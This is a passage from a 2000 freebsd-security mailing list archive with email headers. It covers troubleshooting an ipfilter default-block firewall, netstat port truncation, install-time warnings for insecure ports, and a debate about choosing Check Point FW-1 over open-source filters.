Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <39DCC1CB.5FDD7F90@allmaui.com>; from craig@allmaui.com on Thu, Oct 05, 2000 at 06:00:43PM +0000 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Oct 05, 2000 at 18:00 +0000, Craig Cowen wrote: > > [ ... you reminded us of your previous post ... ] > > I have setup ipf with options IPFILTER_DEFAULT_BLOCK in my > kernel. When using ipnat, I have 'pass in on (private > interface) from 192.168.0.0/24 to any keep state' in my rules. If this rule is a citation, you should have gotten it rejected by ipf. As soon as you want to "keep state" you have to specify one of the tcp / udp / icmp protocols (don't know right now if "from IP" will work with a specified protocol, either). If this was off your mind, please make sure you tell us about your setup correctly, until there nobody could really help. > I have no rules specified for the public interface. > The boxen behind the firewall can surf. If *this* works, I could see a chance for - ipf not being active at all or - ipf being absolutely open Did you build the kernel after setting IPFILTER_DEFAULT_BLOCK (no kidding here), did you install it, did you boot it? What does 'ipf -V' tell you? What does 'ipfstat -in; ipfstat -on' tell you? Editing config files is one thing, loading these setting is another. That's why one always asks the system about its vision and not the admin about his intension. :) Have you read the ipf howto? It's very comprehensive and helpful, even for those not employing ipfilter. It has lots of basics, too, and should be recommended reading for anyone setting up a packet filter. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 19:42:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id A003337B502 for ; Fri, 6 Oct 2000 19:42:08 -0700 (PDT) Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id WAA15545; Fri, 6 Oct 2000 22:42:00 -0400 Message-ID: <39DE8D1B.923D86DF@allmaui.com> Date: Fri, 06 Oct 2000 19:40:27 -0700 From: Craig Cowen X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Gerhard Sittig , "freebsd-security@FreeBSD.ORG" Subject: Re: Default Deny References: <200010060056.LAA11152@cairo.anu.edu.au> <39DCC1CB.5FDD7F90@allmaui.com> <20001006204807.M31338@speedy.gsinet> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I appreciate your response and your questions. Yes I did compile and install. You sound like me talking to my users at work. ipf -V: ipf: IP Filter: v3.4.8 (264) Kernel: IP Filter: v3.4.8 Running: yes Log Flags: 0 = none set Default: block all, Logging: available Active list: 0 hope fully paronoia hasn't ruined this ipfstat -in @1 pass in on lo0 proto tcp from 127.0.0.1/32 to 127.0.0.1/32 @2 pass in on lo0 proto udp from 127.0.0.1/32 to 127.0.0.1/32 @3 pass in on lo0 proto icmp from 127.0.0.1/32 to 127.0.0.1/32 @4 block in log on xl0 proto tcp from 134.122.0.0/16 to publicinterface/32 #these 3 lines are to keep the guys at work out explicitly @5 block in log on xl0 proto udp from 134.122.0.0/16 to publicinterface/32 @6 block in log on xl0 proto icmp from 134.122.0.0/16 to publicinterface/32 @7 block in log on xl0 proto tcp from any to publicinterface/32 @8 block in log on xl0 proto udp from any to publicinterface/32 @9 block in log on xl0 proto icmp from any to publicinterface/32 @10 pass in on xl0 proto tcp from desktop@work/32 to publicinterface/32 @11 pass in on xl0 proto udp from desktop@work/32 to publicinterface/32 @12 pass in on xl0 proto icmp from desktop@work/32 to publicinterface/32 @13 pass in on dc0 proto tcp from 192.168.1.0/24 to any keep state @14 pass in on dc0 proto udp from 192.168.1.0/24 to any keep state @15 pass in on dc0 proto icmp from 192.168.1.0/24 to any keep state ipfstat -on @1 pass out on lo0 proto tcp from 127.0.0.1/32 to 127.0.0.1/32 @2 pass out on lo0 proto udp from 127.0.0.1/32 to 127.0.0.1/32 @3 pass out on lo0 proto icmp from 127.0.0.1/32 to 127.0.0.1/32 @4 pass out log quick proto tcp from publicinterface/32 to any keep state #This is necassary to allow me to surf out from my firewall box @5 pass out log quick proto udp from publicinterface/32 to any keep state #with these commented out I am still able to surf from inside @6 pass out log quick proto icmp from publicinterface/32 to any keep state @7 pass out on dc0 proto tcp from 192.168.1.0/24 to 192.168.1.0/24 @8 pass out on dc0 proto udp from 192.168.1.0/24 to 192.168.1.0/24 @9 pass out on dc0 proto icmp from 192.168.1.0/24 to 192.168.1.0/24 I use this to reload my settings after changes #!/bin/sh ipf -D ipf -Fa -f /etc/ipf.conf -E ipnat -CF -f /etc/ipnat.conf I have read the howto, that is how I got this far. I was a little shocked when I saw the results of being able to surf Thanks for your help, Craig Gerhard Sittig wrote: > On Thu, Oct 05, 2000 at 18:00 +0000, Craig Cowen wrote: > > > > [ ... you reminded us of your previous post ... ] > > > > I have setup ipf with options IPFILTER_DEFAULT_BLOCK in my > > kernel. When using ipnat, I have 'pass in on (private > > interface) from 192.168.0.0/24 to any keep state' in my rules. > > If this rule is a citation, you should have gotten it rejected by > ipf. As soon as you want to "keep state" you have to specify one > of the tcp / udp / icmp protocols (don't know right now if "from > IP" will work with a specified protocol, either). > > If this was off your mind, please make sure you tell us about > your setup correctly, until there nobody could really help. > > > I have no rules specified for the public interface. > > The boxen behind the firewall can surf. > > If *this* works, I could see a chance for > - ipf not being active at all or > - ipf being absolutely open > > Did you build the kernel after setting IPFILTER_DEFAULT_BLOCK (no > kidding here), did you install it, did you boot it? What does > 'ipf -V' tell you? What does 'ipfstat -in; ipfstat -on' tell > you? Editing config files is one thing, loading these setting is > another. That's why one always asks the system about its vision > and not the admin about his intension. :) > > Have you read the ipf howto? It's very comprehensive and > helpful, even for those not employing ipfilter. It has lots of > basics, too, and should be recommended reading for anyone setting > up a packet filter. > > virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 > Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net > -- > If you don't understand or are scared by any of the above > ask your parents or an adult to help you. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 21:28:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 08A2E37B66C for ; Fri, 6 Oct 2000 21:28:27 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Fri, 6 Oct 2000 21:27:09 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e974SFk66388; Fri, 6 Oct 2000 21:28:15 -0700 (PDT) (envelope-from cjc) Date: Fri, 6 Oct 2000 21:28:15 -0700 From: "Crist J . Clark" To: Drew Derbyshire Cc: security@FreeBSD.ORG Subject: Re: sockstat (was Re: cvs commit: src/etc inetd.conf) Message-ID: <20001006212815.P25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <39D93044.8B0C4E69@ursine.com> <20001006153343.B232@ringwraith.office1.bg> <002101c02f99$a04b6010$94cba8c0@hh.kew.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <002101c02f99$a04b6010$94cba8c0@hh.kew.com>; from software@kew.com on Fri, Oct 06, 2000 at 09:30:43AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Oct 06, 2000 at 09:30:43AM -0400, Drew Derbyshire wrote: > > And to paraphrase an earlier comment by DES, > > "Funny way to say sockstat | fgrep '*.*'" :) > > Urp! > > sockstat seems to truncate port numbers on the FOREIGN ADDRESS under 4.1 > release ... > > USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS > postfix smtpd 44199 4 tcp4 *.25 *.* > root sshd 44004 4 tcp4 192.168.203.135.22 192.168.203.148.13 > socks socks5 43989 5 tcp4 192.168.203.135.10 *.* > socks socks5 43989 6 tcp4 192.168.203.135.10 192.168.203.145.10 > socks socks5 43989 7 tcp4 24.218.227.234.311 205.188.6.205.5190 > > Looking at netstat for the ssh connection: > > tcp4 0 36 192.168.203.135.22 192.168.203.148.1302 > ESTABLISHED It's not really a sockstat(1) limitation. The field truncation happens in netstat(1), % netstat -Aan Active Internet connections (including servers) Socket Proto Recv-Q Send-Q Local Address Foreign Address (state) c7c662e0 tcp4 0 0 64.6.211.149.3082 207.126.101.100.11 ESTABLISHED [snip] That second number is actually port 119. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 22:59: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id 0A8AF37B66C for ; Fri, 6 Oct 2000 22:59:07 -0700 (PDT) Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id BAA02151 for ; Sat, 7 Oct 2000 01:59:05 -0400 Message-ID: <39DEBB51.E51BACFB@allmaui.com> Date: Fri, 06 Oct 2000 22:57:37 -0700 From: Craig Cowen X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: "freebsd-security@FreeBSD.ORG" Subject: Check Point FW-1 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The big cheeses at work want to use check point instead of ipf or any other open source solution. Can anybody help me with vunerabilities to this so that I can change thier minds? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 23: 6:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from klapaucius.zer0.org (klapaucius.zer0.org [204.152.186.45]) by hub.freebsd.org (Postfix) with ESMTP id 43E8837B503 for ; Fri, 6 Oct 2000 23:06:29 -0700 (PDT) Received: by klapaucius.zer0.org (Postfix, from userid 1001) id EA79C239A47; Fri, 6 Oct 2000 23:06:28 -0700 (PDT) Date: Fri, 6 Oct 2000 23:06:28 -0700 From: Gregory Sutter To: Craig Cowen Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 Message-ID: <20001006230628.L23587@klapaucius.zer0.org> References: <39DEBB51.E51BACFB@allmaui.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <39DEBB51.E51BACFB@allmaui.com>; from craig@allmaui.com on Fri, Oct 06, 2000 at 10:57:37PM -0700 Organization: Zer0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2000-10-06 22:57 -0700, Craig Cowen wrote: > The big cheeses at work want to use check point instead of ipf or any > other open source solution. > Can anybody help me with vunerabilities to this so that I can change > thier minds? Go search the Bugtraq archives at http://www.securityfocus.com/ for lots of Checkpoint fun. Greg -- Gregory S. Sutter The best way to accelerate Windows mailto:gsutter@zer0.org is at 9.8 m/s^2. http://www.zer0.org/~gsutter/ PGP DSS public key 0x40AE3052 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 0:48: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 6DDD837B502 for ; Sat, 7 Oct 2000 00:47:57 -0700 (PDT) Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id SAA26913; Sat, 7 Oct 2000 18:47:45 +1100 (EST) From: Darren Reed Message-Id: <200010070747.SAA26913@cairo.anu.edu.au> Subject: Re: Check Point FW-1 To: craig@allmaui.com (Craig Cowen) Date: Sat, 7 Oct 2000 18:47:45 +1100 (Australia/NSW) Cc: freebsd-security@FreeBSD.ORG (freebsd-security@FreeBSD.ORG) In-Reply-To: <39DEBB51.E51BACFB@allmaui.com> from "Craig Cowen" at Oct 06, 2000 10:57:37 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Craig Cowen, sie said: > > The big cheeses at work want to use check point instead of ipf or any > other open source solution. > Can anybody help me with vunerabilities to this so that I can change > thier minds? Tell them that IP Filter is the software which protects Firewall-1 from the Internet when running on Solaris - you have to go with naked FW-1 on NT. There are two factors to this equation, however. FW-1 is typically deployed on Solaris/NT machines although now the Nokia box makes up a large number of those sales. The Nokia boxes run IPSO which was, long ago, FreeBSD (I'm told it no longer bears much resemblence). Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 1:23:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id BFED537B502 for ; Sat, 7 Oct 2000 01:23:37 -0700 (PDT) Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id EAA30893; Sat, 7 Oct 2000 04:23:29 -0400 Message-ID: <39DEDD2B.E5BF4463@allmaui.com> Date: Sat, 07 Oct 2000 01:22:03 -0700 From: Craig Cowen X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Darren Reed Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 References: <200010070747.SAA26913@cairo.anu.edu.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks, They are going to put it on an NT machine. They don't trust ipfilter or anything else that is not commercial. Maybe I could get some suits to guarentee it with a corporate label. Craig Darren Reed wrote: > In some mail from Craig Cowen, sie said: > > > > The big cheeses at work want to use check point instead of ipf or any > > other open source solution. > > Can anybody help me with vunerabilities to this so that I can change > > thier minds? > > Tell them that IP Filter is the software which protects Firewall-1 from > the Internet when running on Solaris - you have to go with naked FW-1 on > NT. There are two factors to this equation, however. FW-1 is typically > deployed on Solaris/NT machines although now the Nokia box makes up a > large number of those sales. The Nokia boxes run IPSO which was, long > ago, FreeBSD (I'm told it no longer bears much resemblence). > > Darren > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 2:32: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 0B4F337B502 for ; Sat, 7 Oct 2000 02:32:04 -0700 (PDT) Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id CAA12083; Sat, 7 Oct 2000 02:32:44 -0700 (PDT) Date: Sat, 7 Oct 2000 02:32:44 -0700 From: Kris Kennaway To: Michael Bryan Cc: freebsd-security@freebsd.org Subject: Re: cvs commit: ports/mail/pine4 Makefile (fwd) Message-ID: <20001007023244.A11196@citusc17.usc.edu> References: <008b01c02a71$6b8938c0$d04379a5@p4f0i0> <200009292349.TAA07263@giganda.komkon.org> <200009302123.PAA13609@harmony.village.org> <39D671D9.62E7148B@ursine.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <39D671D9.62E7148B@ursine.com>; from fbsd-security@ursine.com on Sat, Sep 30, 2000 at 04:06:01PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Sep 30, 2000 at 04:06:01PM -0700, Michael Bryan wrote: > Warner Losh wrote: > > > > Maybe we need a category that is "This program may be insecure, set > > INSECURE_OK in your /etc/make.conf if you don't have a problem with > > that" for ports. > > I don't like the idea of a setting that gets set once, then allows all > insecure ports to get installed without additional user confirmation. Me either..each port is insecure in a different way. > I'd much prefer an implementation that provided the following functionality: > > 1) By default, will not install a particular port if it is > marked as potentially dangerous, but will instead provide > a warning to the user/installer. > > 2) The user can do an override for that particular port to go > ahead and install it anyway. That override must not carry > over to other insecure ports, and it probably should not > carry over to future re-installs of the same port. (In other > words, each and every time you go to build/install an insecure > port, you have to do something to override the default lockout.) > That way, the admin/user gets reminded of the potential danger > at every reasonable point. This is actually pretty similar to what I've been doing for insecure ports which people may still want to install - the port pops up a dialog box at port/package install-time explaining the issue and asking for confirmation before proceeding. I think this strikes a good balance between security and ease of use - although a notable downside is that the current incarnation of sysinstall is not capable of playing well with packages which do this (the dialog box is displayed over on vty2, but the actual screen display on vty1 doesn't indicate the port is interactive and awaiting a keypress). Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 4:41:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 957D137B502 for ; Sat, 7 Oct 2000 04:41:53 -0700 (PDT) Received: from earth.causticlabs.com (oca-c1s2-13.mfi.net [209.26.94.60]) by pawn.primelocation.net (Postfix) with ESMTP id 5A0889B05; Sat, 7 Oct 2000 07:41:52 -0400 (EDT) Received: by earth.causticlabs.com (Postfix, from userid 1000) id DC24B7C7F; Sat, 7 Oct 2000 07:41:45 -0400 (EDT) Date: Sat, 7 Oct 2000 07:41:45 -0400 From: Chris Faulhaber To: Craig Cowen Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 Message-ID: <20001007074145.A59213@earth.causticlabs.com> Mail-Followup-To: Chris Faulhaber , Craig Cowen , "freebsd-security@FreeBSD.ORG" References: <39DEBB51.E51BACFB@allmaui.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <39DEBB51.E51BACFB@allmaui.com>; from craig@allmaui.com on Fri, Oct 06, 2000 at 10:57:37PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Oct 06, 2000 at 10:57:37PM -0700, Craig Cowen wrote: > The big cheeses at work want to use check point instead of ipf or any > other open source solution. > Can anybody help me with vunerabilities to this so that I can change > thier minds? > Ah, so your PHB's are security experts? Make sure their number is the first one called when problems arise :) -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 8:49:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id ED2BE37B503 for ; Sat, 7 Oct 2000 08:49:37 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13hwDl-0001s4-00; Sat, 07 Oct 2000 17:49:09 +0200 Date: Sat, 7 Oct 2000 17:49:09 +0200 (IST) From: Roman Shterenzon To: Chris Faulhaber Cc: Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 In-Reply-To: <20001007074145.A59213@earth.causticlabs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 7 Oct 2000, Chris Faulhaber wrote: > On Fri, Oct 06, 2000 at 10:57:37PM -0700, Craig Cowen wrote: > > The big cheeses at work want to use check point instead of ipf or any > > other open source solution. > > Can anybody help me with vunerabilities to this so that I can change > > thier minds? > > > > Ah, so your PHB's are security experts? Make sure their number is the > first one called when problems arise :) Hi, Speaking for myself (Xpert are official ChekPoint dealer) I can say that although FW-1 might had some problems, it's quite good. It's quite secure as well (usually installed on Solaris/(sparc|i386) ) It's very easy in administration and has very nice GUI. It also includes VPN which makes it very useful for enterprise deployment. I think it's a good product after all. P.S. I once started making gui for ipfilter that resembles cp fw1, but didn't finish it.. --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 8:53:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from zeta.qmw.ac.uk (zeta.qmw.ac.uk [138.37.6.6]) by hub.freebsd.org (Postfix) with ESMTP id A14AC37B502 for ; Sat, 7 Oct 2000 08:53:20 -0700 (PDT) Received: from dialup-janus.css.qmw.ac.uk ([138.37.11.110]) by zeta.qmw.ac.uk with esmtp (Exim 3.02 #1) id 13hwHG-0003nT-00; Sat, 07 Oct 2000 16:52:47 +0100 Received: from david by dialup-janus.css.qmw.ac.uk with local (Exim 2.12 #1) id 13hwGN-000Njf-00; Sat, 7 Oct 2000 16:51:51 +0100 X-Mailer: exmh version 2.0.2 2/24/98 To: Craig Cowen Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 In-reply-to: Your message of "Sat, 07 Oct 2000 01:22:03 PDT." <39DEDD2B.E5BF4463@allmaui.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 07 Oct 2000 16:51:51 +0100 From: David Pick Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > They are going to put it on an NT machine. > They don't trust ipfilter or anything else that is not commercial. > Maybe I could get some suits to guarentee it with a corporate label. You can certainly get a support contract for FreeBSD - speak to BSDi. I don't know if ipfilter would need to be specifically included or if it is covered as a part of FreeBSD. I'd also point out that in many cases the *real* situation is not that thet don't trust anything that's not commercial; they don't trust alything *at all* and are really concerned that there is some external company that can point the finger of blame at and/or sue when/if anything untoward *does* happen. The other, less common, situtation I've seen is that the bosses don't want their local "expert" to be a real expert on whom they depend; they're frightened you'll be able to override them with *their* bosses and/or that you'll demand more money and make their budget(s) look bad; or even earn more money than they do... (Slightly) changing the subject: I've been looking at ipfilter myself recently although I wouldn't claim to be an expert, and I'd make the following comments on the rules you posted recently: 1) If the three rules you commented as "to keep the guys at work out explicitly" are intended to keep a separate set of counts, &c, from the next three rules that block *any* source; then I *think* you need to reverse the two blocks of three because you havn't used the "quick" keyword, and without that the rule that gains the credit is the *last* rule that matches. 2) There's very little point in using "keep state" for *tcp* unless you're doing so on the first call-setup packet. A "keep state" that gets triggered on a subsequent packet will cause a state table entry with incomplete status information and this will time out rather more quickly, causing calls to jam for no good reason. -- David Pick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 9:50:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from athena.za.net (athena.za.net [196.30.167.200]) by hub.freebsd.org (Postfix) with ESMTP id EA22837B502 for ; Sat, 7 Oct 2000 09:50:09 -0700 (PDT) Received: from localhost (jus@localhost) by athena.za.net (8.9.3/8.9.3) with ESMTP id QAA07698; Sat, 7 Oct 2000 16:51:21 GMT (envelope-from jus@security.za.net) X-Authentication-Warning: athena.za.net: jus owned process doing -bs Date: Sat, 7 Oct 2000 18:51:20 +0200 (SAST) From: Justin Stanford X-Sender: jus@athena.za.net To: David Pick Cc: Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alternatively, if they won't bend to going non-commercial, take a look at cequrux firewall (http://www.cequrux.com) - it is based on FreeBSD and comes highly recommended from both the large and small companies that use it. I know that UUNet-ZA uses them for their network. It is also well priced. Regards, jus -- Justin Stanford 082 7402741 jus@security.za.net www.security.za.net IT Security and Solutions To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 10:33:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from natto.numachi.com (natto.numachi.com [198.175.254.216]) by hub.freebsd.org (Postfix) with SMTP id D781337B503 for ; Sat, 7 Oct 2000 10:33:44 -0700 (PDT) Received: (qmail 54923 invoked by uid 1001); 7 Oct 2000 17:33:04 -0000 Date: Sat, 7 Oct 2000 13:33:04 -0400 From: Brian Reichert To: Craig Cowen Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 Message-ID: <20001007133304.B54883@numachi.com> References: <39DEBB51.E51BACFB@allmaui.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <39DEBB51.E51BACFB@allmaui.com>; from craig@allmaui.com on Fri, Oct 06, 2000 at 10:57:37PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Oct 06, 2000 at 10:57:37PM -0700, Craig Cowen wrote: > The big cheeses at work want to use check point instead of ipf or any > other open source solution. > Can anybody help me with vunerabilities to this so that I can change > thier minds? I found that Checkpoint 4.0 (this may have changed) doesn't do NAT right; it uses NAT across _all_ interfaces, instead of letting you pick one. This means if you have two internal nets that are connected to the firewall box, the traffic between them seems as if it's coming fro mthe public interface. This can confuse ACLs... (You suppose can Do the Right Thing, but their silly GUI tool imposes a ton of work on you to accomplish it...) > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Brian 'you Bastard' Reichert 37 Crystal Ave. #303 Daytime number: (603) 434-6842 Derry NH 03038-1713 USA Intel architecture: the left-hand path To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 10:38:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from natto.numachi.com (natto.numachi.com [198.175.254.216]) by hub.freebsd.org (Postfix) with SMTP id E24A337B66D for ; Sat, 7 Oct 2000 10:38:38 -0700 (PDT) Received: (qmail 54976 invoked by uid 1001); 7 Oct 2000 17:38:04 -0000 Date: Sat, 7 Oct 2000 13:38:04 -0400 From: Brian Reichert To: Roman Shterenzon Cc: Chris Faulhaber , Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 Message-ID: <20001007133804.C54883@numachi.com> References: <20001007074145.A59213@earth.causticlabs.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from roman@xpert.com on Sat, Oct 07, 2000 at 05:49:09PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Oct 07, 2000 at 05:49:09PM +0200, Roman Shterenzon wrote: > Hi, > Speaking for myself (Xpert are official ChekPoint dealer) I can say that > although FW-1 might had some problems, it's quite good. > It's quite secure as well (usually installed on Solaris/(sparc|i386) ) I've never installed it. I 'inherited' a CheckPoint box running under Solaris, and, from an internel net had to break in to the box to grant myself admin privs. I got in because UNIX services under SunOS 5.6 were misconfigured. That's not CheckPoint's fault. But I don't think it's fair to claim that the presence of CheckPoint makes the box secure... > --Roman Shterenzon, UNIX System Administrator and Consultant > [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] -- Brian 'you Bastard' Reichert 37 Crystal Ave. #303 Daytime number: (603) 434-6842 Derry NH 03038-1713 USA Intel architecture: the left-hand path To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 10:41:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id A95D837B502 for ; Sat, 7 Oct 2000 10:41:50 -0700 (PDT) Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id EAA09090; Sun, 8 Oct 2000 04:41:39 +1100 (EST) From: Darren Reed Message-Id: <200010071741.EAA09090@cairo.anu.edu.au> Subject: Re: Check Point FW-1 To: craig@allmaui.com (Craig Cowen) Date: Sun, 8 Oct 2000 04:41:39 +1100 (Australia/NSW) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <39DEDD2B.E5BF4463@allmaui.com> from "Craig Cowen" at Oct 07, 2000 01:22:03 AM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Craig Cowen, sie said: > > Thanks, > They are going to put it on an 